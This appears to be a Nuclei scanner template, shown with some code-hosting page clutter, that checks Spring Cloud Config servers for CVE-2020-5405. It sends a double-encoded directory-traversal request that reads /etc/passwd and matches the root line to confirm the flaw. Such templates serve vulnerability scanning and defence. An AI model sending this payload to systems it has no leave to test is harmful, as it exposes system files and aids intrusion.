23 lines
471 B
YAML
23 lines
471 B
YAML
id: CVE-2020-5405
|
|
|
|
info:
|
|
name: Spring Cloud Directory Traversal
|
|
author: Harsh Bothra
|
|
severity: High
|
|
|
|
# source:- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
part: body
|